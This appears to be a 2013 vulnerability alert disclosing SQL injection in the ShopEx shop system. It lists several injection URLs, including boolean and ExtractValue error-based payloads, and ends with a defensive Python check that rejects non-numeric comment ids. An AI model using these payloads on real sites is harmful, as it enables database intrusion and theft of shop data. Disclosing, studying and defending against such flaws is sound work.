ShopEx all-version injection 0day: two vulnerabilities - Vulnerability Alerts - Black Bar Safety Net

2013-02-04T00:00:00
ID MYHACK58:62201337144
Type myhack58
Reporter Anonymous
Modified 2013-02-04T00:00:00

Description

Injection is a classic vulnerability type. Since my last in-depth chat with friends about injection, my understanding of it has gone up a level: places that, in my view, could not be injected, damn it, turned out to be injectable. Injection attacks first appeared in 1998, as far as I remember. 10 years on they still exist; they turn up less often than before, but injection is still one of the must-use attack techniques...

Okay, I digress~~ In fact, injection does not only appear in dynamic pages; once a site has been made pseudo-static, can it no longer be injected? NO~ Enough rambling, on to the topic: injection vulnerabilities in the ShopEx online shop system. The injection points are as follows:

http://www.x.cn/index.php?comment-822'//and//'1'='1-ask-commentlist.html

http://www.x.com/comment-8967'//and//ExtractValue(0x64,concat(0x01,(select//@@version)))//order//by//'1-ask-commentlist.html

http://www.x.cn/index.php?comment-822'//and//'1'='1-ask-commentlist.html

http://demo.x.com.cn/485/index.php?comment-190'//and//'1'='1-ask-commentlist.html

One is an injection on a site that has not enabled pseudo-static URLs, one is an injection on a site with pseudo-static URLs enabled; combined with whether error output is suppressed or not, that makes 2x2=4 cases. I won't go into how to do the injection, it is 10-year-old stuff... if you don't know how...
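A defensive check for the route shown above, as an added example that is not part of the original post or ShopEx's own code: it accepts the comment-list URL only when the id segment is purely numeric, in both the index.php? form and the pseudo-static form. The route pattern and the function names are assumptions inferred from the URLs above; the benign sample URLs are constructed.

```python
import re
from urllib.parse import urlsplit, unquote

# Assumed route shape, inferred from the URLs on this page:
#   comment-<numeric id>-ask-commentlist.html
ROUTE = re.compile(r"comment-(\d{1,10})-ask-commentlist\.html")
# The route starts at the first "comment-" that follows "/" or "?".
ROUTE_START = re.compile(r"(?:^|[/?])(comment-.*)$", re.S)


def routed_segment(url):
    """Return the decoded comment route for either URL style, or None."""
    parts = urlsplit(url)
    # Pseudo-static off: route is the query string (index.php?comment-...).
    # Pseudo-static on: route is in the path (/comment-...). Injected text may
    # itself contain "/", so do not split on the last slash.
    target = parts.path + ("?" + parts.query if parts.query else "")
    match = ROUTE_START.search(unquote(target))
    return match.group(1) if match else None


def comment_id(url):
    """Return the id as int when the route is well-formed, else None."""
    segment = routed_segment(url)
    if segment is None:
        return None
    match = ROUTE.fullmatch(segment)
    return int(match.group(1)) if match else None


def classify(url):
    """'ok' = numeric id, 'reject' = comment route with a non-numeric id
    (block and log it), 'other' = a different route."""
    if routed_segment(url) is None:
        return "other"
    return "ok" if comment_id(url) is not None else "reject"


if __name__ == "__main__":
    samples = [
        "http://www.x.cn/index.php?comment-822-ask-commentlist.html",  # constructed, benign
        "http://www.x.com/comment-8967-ask-commentlist.html",          # constructed, benign
        "http://www.x.cn/index.php?comment-822'//and//'1'='1-ask-commentlist.html",  # from the page
        "http://www.x.com/comment-8967%27-ask-commentlist.html",       # constructed, encoded quote
    ]
    for url in samples:
        print(classify(url), url)
```

An id that passes this check should still be bound as a query parameter rather than concatenated into the SQL string; the route check is the first layer, not the only one.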